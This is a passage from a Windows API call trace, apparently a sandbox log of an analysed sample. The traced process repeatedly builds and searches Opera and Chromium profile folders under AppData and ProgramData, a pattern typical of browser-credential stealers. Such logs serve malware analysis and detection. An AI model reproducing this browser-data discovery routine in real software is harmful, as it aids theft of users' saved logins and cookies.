HALPmcxz\\AppData\\Local\\Opera Software\\*.*", lpFindFileData=0x2df848 | out: lpFindFileData=0x2df848*(dwFileAttributes=0x909f48, ftCreationTime.dwLowDateTime=0x8e0150, ftCreationTime.dwHighDateTime=0x90a94c, ftLastAccessTime.dwLowDateTime=0x8e0000, ftLastAccessTime.dwHighDateTime=0x8e0150, ftLastWriteTime.dwLowDateTime=0x2df870, ftLastWriteTime.dwHighDateTime=0x7607cb5c, nFileSizeHigh=0x8e0150, nFileSizeLow=0x2000002, dwReserved0=0x58, dwReserved1=0x10000010, cFileName="\r", cAlternateFileName="勈\x92練-ိ\x07")) returned 0xffffffff [0163.891] VirtualQuery (in: lpAddress=0x926360, lpBuffer=0x2df804, dwLength=0x1c | out: lpBuffer=0x2df804*(BaseAddress=0x926000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.891] GetProcessHeap () returned 0x8e0000 [0163.891] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x926360 | out: hHeap=0x8e0000) returned 1 [0163.891] VirtualQuery (in: lpAddress=0x8efeb0, lpBuffer=0x2dfa7c, dwLength=0x1c | out: lpBuffer=0x2dfa7c*(BaseAddress=0x8ef000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x38000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.891] GetProcessHeap () returned 0x8e0000 [0163.891] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x8efeb0 | out: hHeap=0x8e0000) returned 1 [0163.891] GetProcessHeap () returned 0x8e0000 [0163.891] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x208) returned 0x9252c8 [0163.891] SHGetFolderPathW (in: hwnd=0x0, csidl=35, hToken=0x0, dwFlags=0x0, pszPath=0x9252c8 | out: pszPath="C:\\ProgramData") returned 0x0 [0163.891] lstrlenW (lpString="C:\\ProgramData") returned 14 [0163.891] lstrlenW (lpString="\\Opera Software") returned 15 [0163.891] GetProcessHeap () returned 0x8e0000 [0163.891] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x3c) returned 0x8f2780 [0163.891] lstrcatW (in: lpString1="", lpString2="C:\\ProgramData" | out: lpString1="C:\\ProgramData") returned="C:\\ProgramData" [0163.891] lstrcatW (in: lpString1="C:\\ProgramData", lpString2="\\Opera Software" | out: lpString1="C:\\ProgramData\\Opera Software") returned="C:\\ProgramData\\Opera Software" [0163.891] VirtualQuery (in: lpAddress=0x9252c8, lpBuffer=0x2dfa70, dwLength=0x1c | out: lpBuffer=0x2dfa70*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.891] GetProcessHeap () returned 0x8e0000 [0163.891] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9252c8 | out: hHeap=0x8e0000) returned 1 [0163.891] lstrlenW (lpString="C:\\ProgramData\\Opera Software") returned 29 [0163.891] lstrlenW (lpString="C:\\ProgramData\\Opera Software") returned 29 [0163.891] lstrlenW (lpString="\\*.*") returned 4 [0163.891] GetProcessHeap () returned 0x8e0000 [0163.891] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x44) returned 0x900390 [0163.891] lstrcatW (in: lpString1="", lpString2="C:\\ProgramData\\Opera Software" | out: lpString1="C:\\ProgramData\\Opera Software") returned="C:\\ProgramData\\Opera Software" [0163.891] lstrcatW (in: lpString1="C:\\ProgramData\\Opera Software", lpString2="\\*.*" | out: lpString1="C:\\ProgramData\\Opera Software\\*.*") returned="C:\\ProgramData\\Opera Software\\*.*" [0163.891] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Opera Software\\*.*", lpFindFileData=0x2df848 | out: lpFindFileData=0x2df848*(dwFileAttributes=0x7607cb17, ftCreationTime.dwLowDateTime=0xe, ftCreationTime.dwHighDateTime=0x90a94c, ftLastAccessTime.dwLowDateTime=0x5c001e, ftLastAccessTime.dwHighDateTime=0x12, ftLastWriteTime.dwLowDateTime=0x2df870, ftLastWriteTime.dwHighDateTime=0x7607cb5c, nFileSizeHigh=0x8e75d0, nFileSizeLow=0x0, dwReserved0=0x1e, dwReserved1=0x7607c3d1, cFileName="", cAlternateFileName="勈\x92練-ိ\x07")) returned 0xffffffff [0163.892] VirtualQuery (in: lpAddress=0x900390, lpBuffer=0x2df804, dwLength=0x1c | out: lpBuffer=0x2df804*(BaseAddress=0x900000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x27000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.892] GetProcessHeap () returned 0x8e0000 [0163.892] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x900390 | out: hHeap=0x8e0000) returned 1 [0163.892] VirtualQuery (in: lpAddress=0x8f2780, lpBuffer=0x2dfa7c, dwLength=0x1c | out: lpBuffer=0x2dfa7c*(BaseAddress=0x8f2000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x35000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.892] GetProcessHeap () returned 0x8e0000 [0163.892] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x8f2780 | out: hHeap=0x8e0000) returned 1 [0163.892] IStream:RemoteSeek (in: This=0x9043c0, dlibMove=0x0, dwOrigin=0x0, plibNewPosition=0x2 | out: plibNewPosition=0x2) returned 0x0 [0163.892] IStream:SetSize (This=0x9043c0, libNewSize=0x2ff) returned 0x0 [0163.892] IStream:RemoteSeek (in: This=0x9043c0, dlibMove=0x2ff, dwOrigin=0x0, plibNewPosition=0x0 | out: plibNewPosition=0x0) returned 0x0 [0163.892] IStream:RemoteSeek (in: This=0x9043c0, dlibMove=0x0, dwOrigin=0x0, plibNewPosition=0x2 | out: plibNewPosition=0x2) returned 0x0 [0163.892] IStream:RemoteSeek (in: This=0x9043c0, dlibMove=0x0, dwOrigin=0x0, plibNewPosition=0x1 | out: plibNewPosition=0x1) returned 0x0 [0163.892] ISequentialStream:RemoteWrite (in: This=0x9043c0, pv=0x2dfadc*=0x0, cb=0x4, pcbWritten=0x2dfad0 | out: pcbWritten=0x2dfad0*=0x4) returned 0x0 [0163.892] ISequentialStream:RemoteWrite (in: This=0x9043c0, pv=0x2dfae8*=0x5, cb=0x2, pcbWritten=0x2dfad0 | out: pcbWritten=0x2dfad0*=0x2) returned 0x0 [0163.892] ISequentialStream:RemoteWrite (in: This=0x9043c0, pv=0x2dfaec*=0x0, cb=0x2, pcbWritten=0x2dfad0 | out: pcbWritten=0x2dfad0*=0x2) returned 0x0 [0163.892] GetProcessHeap () returned 0x8e0000 [0163.892] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x208) returned 0x9252c8 [0163.893] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x9252c8 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 0x0 [0163.893] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 45 [0163.893] lstrlenW (lpString="\\Chromium") returned 9 [0163.893] GetProcessHeap () returned 0x8e0000 [0163.893] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x6e) returned 0x909f48 [0163.893] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming" [0163.893] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming", lpString2="\\Chromium" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Chromium") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Chromium" [0163.893] VirtualQuery (in: lpAddress=0x9252c8, lpBuffer=0x2dfa70, dwLength=0x1c | out: lpBuffer=0x2dfa70*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.893] GetProcessHeap () returned 0x8e0000 [0163.893] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9252c8 | out: hHeap=0x8e0000) returned 1 [0163.893] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Chromium") returned 54 [0163.893] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Chromium") returned 54 [0163.893] lstrlenW (lpString="\\*.*") returned 4 [0163.893] GetProcessHeap () returned 0x8e0000 [0163.893] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x76) returned 0x8efeb0 [0163.893] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Chromium" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Chromium") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Chromium" [0163.893] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Chromium", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Chromium\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Chromium\\*.*" [0163.893] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Chromium\\*.*", lpFindFileData=0x2df848 | out: lpFindFileData=0x2df848*(dwFileAttributes=0x926360, ftCreationTime.dwLowDateTime=0x8e0150, ftCreationTime.dwHighDateTime=0x926360, ftLastAccessTime.dwLowDateTime=0x8e0000, ftLastAccessTime.dwHighDateTime=0x8e0150, ftLastWriteTime.dwLowDateTime=0xa, ftLastWriteTime.dwHighDateTime=0xc, nFileSizeHigh=0x8e0150, nFileSizeLow=0x2000002, dwReserved0=0x909f43, dwReserved1=0x3d00003d, cFileName="\r", cAlternateFileName="勈\x92練-ိ\x07")) returned 0xffffffff [0163.893] VirtualQuery (in: lpAddress=0x8efeb0, lpBuffer=0x2df804, dwLength=0x1c | out: lpBuffer=0x2df804*(BaseAddress=0x8ef000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x38000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.893] GetProcessHeap () returned 0x8e0000 [0163.893] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x8efeb0 | out: hHeap=0x8e0000) returned 1 [0163.893] VirtualQuery (in: lpAddress=0x909f48, lpBuffer=0x2dfa7c, dwLength=0x1c | out: lpBuffer=0x2dfa7c*(BaseAddress=0x909000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x1e000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.894] GetProcessHeap () returned 0x8e0000 [0163.894] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x909f48 | out: hHeap=0x8e0000) returned 1 [0163.894] GetProcessHeap () returned 0x8e0000 [0163.894] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x208) returned 0x9252c8 [0163.894] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x9252c8 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 0x0 [0163.894] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 43 [0163.894] lstrlenW (lpString="\\Chromium") returned 9 [0163.894] GetProcessHeap () returned 0x8e0000 [0163.894] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x6a) returned 0x909f48 [0163.894] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local" [0163.894] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", lpString2="\\Chromium" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Chromium") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Chromium" [0163.894] VirtualQuery (in: lpAddress=0x9252c8, lpBuffer=0x2dfa70, dwLength=0x1c | out: lpBuffer=0x2dfa70*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.894] GetProcessHeap () returned 0x8e0000 [0163.894] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9252c8 | out: hHeap=0x8e0000) returned 1 [0163.894] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Chromium") returned 52 [0163.894] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Chromium") returned 52 [0163.894] lstrlenW (lpString="\\*.*") returned 4 [0163.894] GetProcessHeap () returned 0x8e0000 [0163.894] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x72) returned 0x8efeb0 [0163.894] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Chromium" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Chromium") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Chromium" [0163.894] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Chromium", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Chromium\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Chromium\\*.*" [0163.894] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Chromium\\*.*", lpFindFileData=0x2df848 | out: lpFindFileData=0x2df848*(dwFileAttributes=0x909f48, ftCreationTime.dwLowDateTime=0x8e0150, ftCreationTime.dwHighDateTime=0x90a94c, ftLastAccessTime.dwLowDateTime=0x8e0000, ftLastAccessTime.dwHighDateTime=0x8e0150, ftLastWriteTime.dwLowDateTime=0x2df870, ftLastWriteTime.dwHighDateTime=0x7607cb5c, nFileSizeHigh=0x8e0150, nFileSizeLow=0x2000002, dwReserved0=0x58, dwReserved1=0x10000010, cFileName="\r", cAlternateFileName="勈\x92練-ိ\x07")) returned 0xffffffff [0163.894] VirtualQuery (in: lpAddress=0x8efeb0, lpBuffer=0x2df804, dwLength=0x1c | out: lpBuffer=0x2df804*(BaseAddress=0x8ef000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x38000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.894] GetProcessHeap () returned 0x8e0000 [0163.894] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x8efeb0 | out: hHeap=0x8e0000) returned 1 [0163.894] VirtualQuery (in: lpAddress=0x909f48, lpBuffer=0x2dfa7c, dwLength=0x1c | out: lpBuffer=0x2dfa7c*(BaseAddress=0x909000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x1e000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.894] GetProcessHeap () returned 0x8e0000 [0163.894] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x909f48 | out: hHeap=0x8e0000) returned 1 [0163.895] GetProcessHeap () returned 0x8e0000 [0163.895] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x208) returned 0x9252c8 [0163.895] SHGetFolderPathW (in: hwnd=0x0, csidl=35, hToken=0x0, dwFlags=0x0, pszPath=0x9252c8 | out: pszPath="C:\\ProgramData") returned 0x0 [0163.895] lstrlenW (lpString="C:\\ProgramData") returned 14 [0163.895] lstrlenW (lpString="\\Chromium") returned 9 [0163.895] GetProcessHeap () returned 0x8e0000 [0163.895] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x30) returned 0x914be0 [0163.895] lstrcatW (in: lpString1="", lpString2="C:\\ProgramData" | out: lpString1="C:\\ProgramData") returned="C:\\ProgramData" [0163.895] lstrcatW (in: lpString1="C:\\ProgramData", lpString2="\\Chromium" | out: lpString1="C:\\ProgramData\\Chromium") returned="C:\\ProgramData\\Chromium" [0163.895] VirtualQuery (in: lpAddress=0x9252c8, lpBuffer=0x2dfa70, dwLength=0x1c | out: lpBuffer=0x2dfa70*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.895] GetProcessHeap () returned 0x8e0000 [0163.895] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9252c8 | out: hHeap=0x8e0000) returned 1 [0163.895] lstrlenW (lpString="C:\\ProgramData\\Chromium") returned 23 [0163.895] lstrlenW (lpString="C:\\ProgramData\\Chromium") returned 23 [0163.895] lstrlenW (lpString="\\*.*") returned 4 [0163.895] GetProcessHeap () returned 0x8e0000 [0163.895] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x38) returned 0x8f9a40 [0163.895] lstrcatW (in: lpString1="", lpString2="C:\\ProgramData\\Chromium" | out: lpString1="C:\\ProgramData\\Chromium") returned="C:\\ProgramData\\Chromium" [0163.895] lstrcatW (in: lpString1="C:\\ProgramData\\Chromium", lpString2="\\*.*" | out: lpString1="C:\\ProgramData\\Chromium\\*.*") returned="C:\\ProgramData\\Chromium\\*.*" [0163.895] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Chromium\\*.*", lpFindFileData=0x2df848 | out: lpFindFileData=0x2df848*(dwFileAttributes=0x7607cb17, ftCreationTime.dwLowDateTime=0xe, ftCreationTime.dwHighDateTime=0x90a94c, ftLastAccessTime.dwLowDateTime=0x66001e, ftLastAccessTime.dwHighDateTime=0x14, ftLastWriteTime.dwLowDateTime=0x2df870, ftLastWriteTime.dwHighDateTime=0x7607cb5c, nFileSizeHigh=0x8e75d0, nFileSizeLow=0x0, dwReserved0=0x1e, dwReserved1=0x7607c3d1, cFileName="", cAlternateFileName="勈\x92練-ိ\x07")) returned 0xffffffff [0163.895] VirtualQuery (in: lpAddress=0x8f9a40, lpBuffer=0x2df804, dwLength=0x1c | out: lpBuffer=0x2df804*(BaseAddress=0x8f9000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2e000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.895] GetProcessHeap () returned 0x8e0000 [0163.895] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x8f9a40 | out: hHeap=0x8e0000) returned 1 [0163.895] VirtualQuery (in: lpAddress=0x914be0, lpBuffer=0x2dfa7c, dwLength=0x1c | out: lpBuffer=0x2dfa7c*(BaseAddress=0x914000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x13000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.895] GetProcessHeap () returned 0x8e0000 [0163.895] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x914be0 | out: hHeap=0x8e0000) returned 1 [0163.895] GetProcessHeap () returned 0x8e0000 [0163.895] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x208) returned 0x9252c8 [0163.895] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x9252c8 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 0x0 [0163.896] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 45 [0163.896] lstrlenW (lpString="\\Chromium") returned 9 [0163.896] GetProcessHeap () returned 0x8e0000 [0163.896] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x6e) returned 0x909f48 [0163.896] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming" [0163.896] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming", lpString2="\\Chromium" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Chromium") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Chromium" [0163.896] VirtualQuery (in: lpAddress=0x9252c8, lpBuffer=0x2dfa70, dwLength=0x1c | out: lpBuffer=0x2dfa70*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.896] GetProcessHeap () returned 0x8e0000 [0163.896] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9252c8 | out: hHeap=0x8e0000) returned 1 [0163.896] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Chromium") returned 54 [0163.896] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Chromium") returned 54 [0163.896] lstrlenW (lpString="\\*.*") returned 4 [0163.896] GetProcessHeap () returned 0x8e0000 [0163.896] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x76) returned 0x8efeb0 [0163.896] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Chromium" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Chromium") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Chromium" [0163.896] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Chromium", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Chromium\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Chromium\\*.*" [0163.896] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Chromium\\*.*", lpFindFileData=0x2df848 | out: lpFindFileData=0x2df848*(dwFileAttributes=0x926360, ftCreationTime.dwLowDateTime=0x8e0150, ftCreationTime.dwHighDateTime=0x926360, ftLastAccessTime.dwLowDateTime=0x8e0000, ftLastAccessTime.dwHighDateTime=0x8e0150, ftLastWriteTime.dwLowDateTime=0xa, ftLastWriteTime.dwHighDateTime=0xc, nFileSizeHigh=0x8e0150, nFileSizeLow=0x2000002, dwReserved0=0x909f43, dwReserved1=0x3d00003d, cFileName="\r", cAlternateFileName="勈\x92練-ိ\x07")) returned 0xffffffff [0163.896] VirtualQuery (in: lpAddress=0x8efeb0, lpBuffer=0x2df804, dwLength=0x1c | out: lpBuffer=0x2df804*(BaseAddress=0x8ef000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x38000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.896] GetProcessHeap () returned 0x8e0000 [0163.896] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x8efeb0 | out: hHeap=0x8e0000) returned 1 [0163.896] VirtualQuery (in: lpAddress=0x909f48, lpBuffer=0x2dfa7c, dwLength=0x1c | out: lpBuffer=0x2dfa7c*(BaseAddress=0x909000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x1e000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.896] GetProcessHeap () returned 0x8e0000 [0163.896] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x909f48 | out: hHeap=0x8e0000) returned 1 [0163.896] GetProcessHeap () returned 0x8e0000 [0163.896] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x208) returned 0x9252c8 [0163.896] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x9252c8 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 0x0 [0163.896] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 43 [0163.896] lstrlenW (lpString="\\Chromium") returned 9 [0163.896] GetProcessHeap () returned 0x8e0000 [0163.897] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x6a) returned 0x909f48 [0163.897] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local" [0163.897] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", lpString2="\\Chromium" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Chromium") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Chromium" [0163.897] VirtualQuery (in: lpAddress=0x9252c8, lpBuffer=0x2dfa70, dwLength=0x1c | out: lpBuffer=0x2dfa70*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.897] GetProcessHeap () returned 0x8e0000 [0163.897] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9252c8 | out: hHeap=0x8e0000) returned 1 [0163.897] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Chromium") returned 52 [0163.897] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Chromium") returned 52 [0163.897] lstrlenW (lpString="\\*.*") returned 4 [0163.897] GetProcessHeap () returned 0x8e0000 [0163.897] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x72) returned 0x8efeb0 [0163.897] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Chromium" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Chromium") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Chromium" [0163.897] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Chromium", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Chromium\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Chromium\\*.*" [0163.897] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Chromium\\*.*", lpFindFileData=0x2df848 | out: lpFindFileData=0x2df848*(dwFileAttributes=0x909f48, ftCreationTime.dwLowDateTime=0x8e0150, ftCreationTime.dwHighDateTime=0x90a94c, ftLastAccessTime.dwLowDateTime=0x8e0000, ftLastAccessTime.dwHighDateTime=0x8e0150, ftLastWriteTime.dwLowDateTime=0x2df870, ftLastWriteTime.dwHighDateTime=0x7607cb5c, nFileSizeHigh=0x8e0150, nFileSizeLow=0x2000002, dwReserved0=0x58, dwReserved1=0x10000010, cFileName="\r", cAlternateFileName="勈\x92練-ိ\x07")) returned 0xffffffff [0163.897] VirtualQuery (in: lpAddress=0x8efeb0, lpBuffer=0x2df804, dwLength=0x1c | out: lpBuffer=0x2df804*(BaseAddress=0x8ef000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x38000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.897] GetProcessHeap () returned 0x8e0000 [0163.897] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x8efeb0 | out: hHeap=0x8e0000) returned 1 [0163.897] VirtualQuery (in: lpAddress=0x909f48, lpBuffer=0x2dfa7c, dwLength=0x1c | out: lpBuffer=0x2dfa7c*(BaseAddress=0x909000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x1e000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.897] GetProcessHeap () returned 0x8e0000 [0163.897] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x909f48 | out: hHeap=0x8e0000) returned 1 [0163.897] GetProcessHeap () returned 0x8e0000 [0163.897] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x208) returned 0x9252c8 [0163.897] SHGetFolderPathW (in: hwnd=0x0, csidl=35, hToken=0x0, dwFlags=0x0, pszPath=0x9252c8 | out: pszPath="C:\\ProgramData") returned 0x0 [0163.897] lstrlenW (lpString="C:\\ProgramData") returned 14 